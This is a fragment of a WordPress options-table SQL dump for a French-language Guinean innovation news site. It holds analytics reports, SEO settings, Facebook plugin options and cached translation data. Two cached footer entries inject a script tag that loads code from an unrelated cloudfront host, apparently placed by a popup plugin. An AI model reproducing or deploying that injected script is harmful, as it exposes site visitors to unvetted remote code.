:2:{i:0;s:8:\"20171024\";i:1;s:1:\"0\";}i:22;a:2:{i:0;s:8:\"20171025\";i:1;s:1:\"0\";}i:23;a:2:{i:0;s:8:\"20171026\";i:1;s:1:\"0\";}i:24;a:2:{i:0;s:8:\"20171027\";i:1;s:1:\"0\";}i:25;a:2:{i:0;s:8:\"20171028\";i:1;s:1:\"0\";}i:26;a:2:{i:0;s:8:\"20171029\";i:1;s:1:\"0\";}i:27;a:2:{i:0;s:8:\"20171030\";i:1;s:1:\"0\";}i:28;a:2:{i:0;s:8:\"20171031\";i:1;s:3:\"108\";}i:29;a:2:{i:0;s:8:\"20171101\";i:1;s:3:\"157\";}i:30;a:2:{i:0;s:8:\"20171102\";i:1;s:3:\"193\";}}}','yes'),(626,'monsterinsights_report_overview_top_content','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:26:{i:0;a:2:{i:0;s:80:\"/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/\";i:1;s:3:\"214\";}i:1;a:2:{i:0;s:84:\"/2017/10/26/alpha-mamadou-diallo-cree-une-plateforme-pour-faciliter-lacces-au-livre/\";i:1;s:3:\"122\";}i:2;a:2:{i:0;s:76:\"/2017/10/26/une-plateforme-dinformations-sur-les-procedures-administratives/\";i:1;s:2:\"51\";}i:3;a:2:{i:0;s:1:\"/\";i:1;s:2:\"14\";}i:4;a:2:{i:0;s:99:\"/2017/10/24/diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent/\";i:1;s:1:\"6\";}i:5;a:2:{i:0;s:79:\"/2017/11/01/lemine-camara-utilise-feuilles-de-kola-regenerer-terres-infertiles/\";i:1;s:1:\"6\";}i:6;a:2:{i:0;s:55:\"/2017/10/26/kerfalla-camara-cree-le-cafe-ziama-macenta/\";i:1;s:1:\"4\";}i:7;a:2:{i:0;s:134:\"/2017/10/30/alpha-oumar-gagne-le-concours-national-de-dessin-et-de-peinture-organise-par-la-delegation-de-lunion-europeenne-en-guinee/\";i:1;s:1:\"4\";}i:8;a:2:{i:0;s:84:\"/2017/11/01/ibrahima-soumano-cree-plateforme-universelle-de-recharges-telephoniques/\";i:1;s:1:\"4\";}i:9;a:2:{i:0;s:19:\"/category/economie/\";i:1;s:1:\"4\";}i:10;a:2:{i:0;s:53:\"/2017/10/26/sambako-et-sa-petite-revolution-agricole/\";i:1;s:1:\"3\";}i:11;a:2:{i:0;s:98:\"/2017/11/01/alpha-amadou-diallo-cree-application-aider-compatriotes-a-se-deplacer-plus-facilement/\";i:1;s:1:\"3\";}i:12;a:2:{i:0;s:181:\"/404.html?page=/wp-content/uploads/2017/10/architecte.jpg&from=https://guineeinnove.nimbasolution.com/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/\";i:1;s:1:\"3\";}i:13;a:2:{i:0;s:22:\"/category/agriculture/\";i:1;s:1:\"3\";}i:14;a:2:{i:0;s:22:\"/category/technologie/\";i:1;s:1:\"3\";}i:15;a:2:{i:0;s:49:\"/2017/10/26/mamoudou-diallo-createur-de-quizz224/\";i:1;s:1:\"2\";}i:16;a:2:{i:0;s:66:\"/2017/10/30/fatou-thithi-camara-creee-un-carnet-de-sante-digitale/\";i:1;s:1:\"2\";}i:17;a:2:{i:0;s:13:\"/technologie/\";i:1;s:1:\"2\";}i:18;a:2:{i:0;s:97:\"/2017/10/24/electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou/\";i:1;s:1:\"1\";}i:19;a:2:{i:0;s:55:\"/2017/10/26/une-marque-de-vetements-de-sport-en-guinee/\";i:1;s:1:\"1\";}i:20;a:2:{i:0;s:40:\"/2017/10/30/sekou-lamine-coyah-bangoura/\";i:1;s:1:\"1\";}i:21;a:2:{i:0;s:83:\"/2017/11/01/fatoumata-cherif-cree-plateforme-de-medias-ligne-developpement-durable/\";i:1;s:1:\"1\";}i:22;a:2:{i:0;s:18:\"/category/culture/\";i:1;s:1:\"1\";}i:23;a:2:{i:0;s:16:\"/category/sante/\";i:1;s:1:\"1\";}i:24;a:2:{i:0;s:18:\"/category/societe/\";i:1;s:1:\"1\";}i:25;a:2:{i:0;s:11:\"/contact-2/\";i:1;s:1:\"1\";}}}','yes'),(627,'monsterinsights_report_overview_top_sources','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:7:{i:0;a:2:{i:0;s:14:\"m.facebook.com\";i:1;s:3:\"311\";}i:1;a:2:{i:0;s:8:\"(direct)\";i:1;s:2:\"81\";}i:2;a:2:{i:0;s:12:\"facebook.com\";i:1;s:2:\"41\";}i:3;a:2:{i:0;s:14:\"l.facebook.com\";i:1;s:2:\"10\";}i:4;a:2:{i:0;s:15:\"lm.facebook.com\";i:1;s:1:\"9\";}i:5;a:2:{i:0;s:6:\"google\";i:1;s:1:\"3\";}i:6;a:2:{i:0;s:16:\"web.facebook.com\";i:1;s:1:\"3\";}}}','yes'),(628,'monsterinsights_report_overview_countries','a:4:{s:10:\"start-date\";s:10:\"2017-10-03\";s:8:\"end-date\";s:10:\"2017-11-02\";s:5:\"total\";a:1:{s:12:\"ga:pageviews\";s:3:\"458\";}s:4:\"data\";a:25:{i:0;a:2:{i:0;s:2:\"GN\";i:1;s:3:\"262\";}i:1;a:2:{i:0;s:2:\"FR\";i:1;s:2:\"64\";}i:2;a:2:{i:0;s:2:\"US\";i:1;s:2:\"23\";}i:3;a:2:{i:0;s:2:\"CH\";i:1;s:2:\"20\";}i:4;a:2:{i:0;s:2:\"CM\";i:1;s:2:\"11\";}i:5;a:2:{i:0;s:2:\"MA\";i:1;s:2:\"11\";}i:6;a:2:{i:0;s:2:\"DE\";i:1;s:2:\"10\";}i:7;a:2:{i:0;s:2:\"TD\";i:1;s:1:\"7\";}i:8;a:2:{i:0;s:2:\"TR\";i:1;s:1:\"7\";}i:9;a:2:{i:0;s:2:\"CA\";i:1;s:1:\"6\";}i:10;a:2:{i:0;s:2:\"RU\";i:1;s:1:\"6\";}i:11;a:2:{i:0;s:2:\"CI\";i:1;s:1:\"5\";}i:12;a:2:{i:0;s:2:\"AO\";i:1;s:1:\"3\";}i:13;a:2:{i:0;s:2:\"DZ\";i:1;s:1:\"3\";}i:14;a:2:{i:0;s:2:\"GH\";i:1;s:1:\"3\";}i:15;a:2:{i:0;s:2:\"SN\";i:1;s:1:\"3\";}i:16;a:2:{i:0;s:2:\"GR\";i:1;s:1:\"2\";}i:17;a:2:{i:0;s:2:\"GW\";i:1;s:1:\"2\";}i:18;a:2:{i:0;s:2:\"NG\";i:1;s:1:\"2\";}i:19;a:2:{i:0;s:2:\"PE\";i:1;s:1:\"2\";}i:20;a:2:{i:0;s:2:\"TN\";i:1;s:1:\"2\";}i:21;a:2:{i:0;s:2:\"BE\";i:1;s:1:\"1\";}i:22;a:2:{i:0;s:2:\"CY\";i:1;s:1:\"1\";}i:23;a:2:{i:0;s:2:\"ES\";i:1;s:1:\"1\";}i:24;a:2:{i:0;s:2:\"MR\";i:1;s:1:\"1\";}}}','yes'),(629,'monsterinsights_tracking_notice','1','yes'),(637,'wpseo','a:25:{s:14:\"blocking_files\";a:0:{}s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:5:\"5.7.1\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:20:\"enable_setting_pages\";b:0;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1509464063;}','yes'),(638,'wpseo_permalinks','a:9:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(639,'wpseo_titles','a:59:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:42:\"%%name%%, auteur sur %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:65:\"Vous avez cherché %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:38:\"Page non trouvée %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:23:\"title-elementor_library\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-elementor_library\";s:0:\"\";s:25:\"metakey-elementor_library\";s:0:\"\";s:25:\"noindex-elementor_library\";b:0;s:26:\"showdate-elementor_library\";b:0;s:29:\"hideeditbox-elementor_library\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(640,'wpseo_social','a:20:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"39b7c9f4fb7fd8fa4f7ecc432f8c9963\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(641,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:64:\"L’article %%POSTLINK%% est apparu en premier sur %%BLOGLINK%%.\";}','yes'),(642,'wpseo_internallinks','a:11:{s:20:\"breadcrumbs-404crumb\";s:30:\"Erreur 404 : Page introuvable\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:13:\"Archives pour\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:7:\"Accueil\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:18:\"Vous avez cherché\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:23:\"post_types-post-maintax\";i:0;s:36:\"post_types-elementor_library-maintax\";i:0;}','yes'),(643,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(644,'wpseo_flush_rewrite','1','yes'),(646,'wpseo_sitemap_1_cache_validator','fcdE','no'),(647,'wpseo_sitemap_category_cache_validator','4OR9o','no'),(648,'wpseo_sitemap_post_cache_validator','fcdQ','no'),(652,'wpseo_sitemap_page_cache_validator','4172G','no'),(733,'main_header_menu','#ffffff','yes'),(734,'sub_menu_bg','#ffffff','yes'),(743,'wpseo_sitemap_cache_validator_global','47KvK','no'),(806,'wpseo_sitemap_835_cache_validator','4yp5u','no'),(821,'wpseo_sitemap_839_cache_validator','4NlsR','no'),(828,'wpseo_sitemap_843_cache_validator','4QwNt','no'),(842,'wpseo_sitemap_846_cache_validator','4Xk35','no'),(854,'wpseo_sitemap_411_cache_validator','5bEoC','no'),(1011,'_site_transient_timeout_community-events-d6714e2123dd9c327e7551c49c974309','1509893894','no'),(1012,'_site_transient_community-events-d6714e2123dd9c327e7551c49c974309','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"41.79.201.0\";}s:6:\"events\";a:0:{}}','no'),(1017,'widget_easy_facebook_feed','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1018,'widget_easy_facebook_page_plugin','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1019,'_efbl_version','4.3.3','no'),(1079,'wpseo_sitemap_880_cache_validator','4ItKX','no'),(1084,'I_HAVE_SUPPORTED_THE_EFBL_PLUGIN','1','no'),(1089,'facebookpopup_fburl','guineeinnovations','yes'),(1090,'facebookpopup_delay','1','yes'),(1091,'_transient_timeout_fb-popup-footer-etdesktop','1510584151','no'),(1092,'_transient_fb-popup-footer-etdesktop','<!-- amvn stundr -->\n<script data-cfasync=\"false\" src=\"//d20je219bs8hnq.cloudfront.net/?sbejd=648371\"></script>','no'),(1097,'_transient_timeout_fb-popup-footer-etmobile','1510584658','no'),(1098,'_transient_fb-popup-footer-etmobile','<!-- amvn stundr -->\n<script data-cfasync=\"false\" src=\"//d20je219bs8hnq.cloudfront.net/?sbejd=648371\"></script>','no'),(1138,'arv_fb24_opt','a:12:{s:5:\"fb_id\";s:17:\"guineeinnovations\";s:14:\"display_on_all\";s:1:\"1\";s:15:\"display_on_page\";s:1:\"1\";s:15:\"display_on_post\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"1\";s:18:\"display_on_archive\";s:1:\"1\";s:5:\"delay\";s:4:\"1000\";s:9:\"show_once\";s:2:\"14\";s:3:\"coc\";s:1:\"1\";s:6:\"scroll\";s:1:\"1\";s:3:\"min\";s:1:\"0\";s:11:\"performance\";s:1:\"1\";}','yes'),(1160,'wp_facebook_popup_settings','a:13:{s:21:\"enable_disable_plugin\";s:1:\"1\";s:10:\"title_text\";s:25:\"Suivez nous sur Facebook!\";s:20:\"facebook_fanpage_url\";s:42:\"https://www.facebook.com/guineeinnovations\";s:9:\"show_post\";s:1:\"1\";s:12:\"show_in_home\";s:1:\"1\";s:12:\"show_in_post\";s:1:\"1\";s:12:\"show_in_page\";s:1:\"1\";s:15:\"show_everywhere\";s:1:\"1\";s:19:\"show_loggedin_users\";s:1:\"1\";s:20:\"show_loggedout_users\";s:1:\"1\";s:13:\"appear_always\";s:1:\"1\";s:28:\"days_until_popup_shows_again\";s:1:\"1\";s:20:\"seconds_popup_appear\";s:1:\"2\";}','yes'),(1171,'widget_facebook_like_box_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1176,'pps_txt_files_css_updated','1','yes'),(1177,'pps_txt_files_css_updated_2','1','yes'),(1178,'wpstg0_pps_db_version','1.9.11','yes'),(1179,'wpstg0_pps_db_installed','1','yes'),(1180,'pps_plugin_activation_errors','','yes'),(1181,'pps_opts_data','a:17:{s:10:\"send_stats\";a:1:{s:5:\"value\";s:1:\"0\";}s:29:\"disable_subscribe_ip_antispam\";a:1:{s:5:\"value\";s:1:\"1\";}s:16:\"disable_autosave\";a:1:{s:5:\"value\";s:1:\"0\";}s:13:\"add_love_link\";a:1:{s:5:\"value\";s:1:\"0\";}s:12:\"access_roles\";a:1:{s:5:\"value\";s:13:\"administrator\";}s:11:\"foot_assets\";a:1:{s:5:\"value\";s:1:\"0\";}s:23:\"disable_email_html_type\";a:1:{s:5:\"value\";s:1:\"0\";}s:13:\"use_local_cdn\";a:1:{s:5:\"value\";s:1:\"0\";}s:16:\"mail_send_engine\";a:1:{s:5:\"value\";s:7:\"wp_mail\";}s:9:\"smtp_host\";a:1:{s:5:\"value\";i:0;}s:10:\"smtp_login\";a:1:{s:5:\"value\";i:0;}s:9:\"smtp_pass\";a:1:{s:5:\"value\";i:0;}s:9:\"smtp_port\";a:1:{s:5:\"value\";i:0;}s:11:\"smtp_secure\";a:1:{s:5:\"value\";s:0:\"\";}s:13:\"sendmail_path\";a:1:{s:5:\"value\";s:24:\"/usr/sbin/sendmail -t -i\";}s:11:\"start_usage\";a:2:{s:5:\"value\";i:1510063734;s:10:\"changed_on\";i:1510063734;}s:17:\"plug_welcome_show\";a:2:{s:5:\"value\";i:1510063734;s:10:\"changed_on\";i:1510063734;}}','yes'),(1182,'pps_plug_was_used','1','yes'),(1183,'pps_stats_recalculated','1','yes'),(1254,'_transient_timeout_elementor_remote_info_api_data_1.7.12','1510261963','no'),(1255,'_transient_elementor_remote_info_api_data_1.7.12','a:2:{s:9:\"timestamp\";i:1510218762;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(1276,'vifslb_like_width','450','yes'),(1277,'vifslb_like_height','30','yes'),(1278,'vifslb_like_layout','standard','yes'),(1279,'vifslb_like_verb','like','yes'),(1280,'vifslb_like_size','small','yes'),(1281,'vifslb_like_align','left','yes'),(1282,'vifslb_like_showfaces','true','yes'),(1283,'vifslb_like_share','true','yes'),(1284,'vifslb_like_show_at_top','true','yes'),(1285,'vifslb_like_show_at_bottom','','yes'),(1286,'vifslb_like_show_on_page','true','yes'),(1287,'vifslb_like_show_on_post','true','yes'),(1288,'vifslb_like_show_on_home','true','yes'),(1289,'vifslb_like_show_on_archive','','yes'),(1290,'vifslb_like_facebook_image','','yes'),(1291,'vifslb_like_html5','','yes'),(1292,'vifslb_like_facebook_app_id','https://www.facebook.com/guineeinnovations/','yes'),(1293,'vifslb_like_use_excerpt_as_description','true','yes'),(1294,'vifslb_like_type','Article','yes'),(1295,'vifslb_like_use_plugin_lang','fr_CA','yes'),(1296,'vifslb_like_btntype','html5','yes'),(1297,'vifslb_like_excludepage','','yes'),(1302,'widget_facebooklikebox','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:31:{s:5:\"title\";s:0:\"\";s:17:\"pluginDisplayType\";s:11:\"page_plugin\";s:10:\"layoutMode\";s:5:\"xfbml\";s:13:\"pluginPageURL\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:15:\"pagePluginWidth\";s:3:\"250\";s:16:\"pagePluginHeight\";s:3:\"250\";s:14:\"hideCoverPhoto\";s:4:\"true\";s:13:\"showPagePosts\";s:4:\"true\";s:12:\"showFacePile\";s:4:\"true\";s:6:\"pageID\";s:15:\"119691288064264\";s:7:\"pageURL\";s:103:\"http://www.facebook.com/pages/VivoCiticom-Joomla-Wordpress-Blogger-Drupal-DNN-Community/119691288064264\";s:10:\"connection\";s:2:\"10\";s:5:\"width\";s:3:\"292\";s:6:\"height\";s:3:\"255\";s:7:\"streams\";s:3:\"yes\";s:11:\"colorScheme\";s:5:\"light\";s:11:\"borderColor\";s:6:\"AAAAAA\";s:9:\"showFaces\";s:3:\"yes\";s:6:\"header\";s:3:\"yes\";s:19:\"fblike_button_style\";s:8:\"standard\";s:29:\"fblike_button_verb_to_display\";s:9:\"recommend\";s:19:\"fblike_button_width\";s:3:\"292\";s:25:\"fblike_button_colorScheme\";s:5:\"light\";s:23:\"fblike_button_showFaces\";s:3:\"yes\";s:18:\"fblike_button_font\";s:5:\"arial\";s:24:\"enableOtherSocialButtons\";s:2:\"no\";s:20:\"addThisVerticalStyle\";s:1:\"1\";s:12:\"addThisPubId\";s:0:\"\";s:20:\"enableTwitterButtons\";s:2:\"no\";s:15:\"twitterUsername\";s:0:\"\";s:18:\"twitterButtonStyle\";s:3:\"127\";}}','yes'),(1322,'_transient_timeout_settings_errors','1510223047','no'),(1323,'_transient_settings_errors','a:1:{i:0;a:4:{s:7:\"setting\";s:7:\"general\";s:4:\"code\";s:16:\"settings_updated\";s:7:\"message\";s:22:\"Options enregistrées.\";s:4:\"type\";s:7:\"updated\";}}','no'),(1328,'pps_unique_stats','a:3:{i:0;s:26:\"check_other_plugs_msg.show\";i:1;s:23:\"enb_promo_link_msg.show\";i:2;s:18:\"enb_stats_msg.show\";}','yes'),(1513,'_site_transient_browser_a9db4d03969fdd98d377b682b063efe6','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"61.0.3163.100\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(1514,'_site_transient_timeout_browser_a9db4d03969fdd98d377b682b063efe6','1511358382','no'),(1542,'trackserver_options','a:14:{s:12:\"trackme_slug\";s:7:\"trackme\";s:17:\"trackme_extension\";s:1:\"z\";s:15:\"mapmytracks_tag\";s:11:\"mapmytracks\";s:11:\"osmand_slug\";s:6:\"osmand\";s:23:\"osmand_trackname_format\";s:12:\"OsmAnd %F %H\";s:17:\"sendlocation_slug\";s:12:\"sendlocation\";s:29:\"sendlocation_trackname_format\";s:18:\"SendLocation %F %H\";s:10:\"upload_tag\";s:8:\"tsupload\";s:13:\"gettrack_slug\";s:20:\"trackserver/gettrack\";s:19:\"normalize_tripnames\";s:3:\"yes\";s:16:\"tripnames_format\";s:5:\"%F %T\";s:8:\"tile_url\";s:49:\"http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png\";s:11:\"attribution\";s:73:\"&copy; <a href=\"http://www.openstreetmap.org/copyright\">OpenStreetMap</a>\";s:10:\"db_version\";i:15;}','yes'),(1693,'wpseo_sitemap_909_cache_validator','5m217','no'),(1836,'_site_transient_timeout_available_translations','1511462794','no'),(1837,'_site_transient_available_translations','a:111:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-09 10:36:40\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-29 08:49:40\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.7/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-22 18:59:07\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-12 20:34:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-08 13:11:50\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-12 13:04:42\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-01 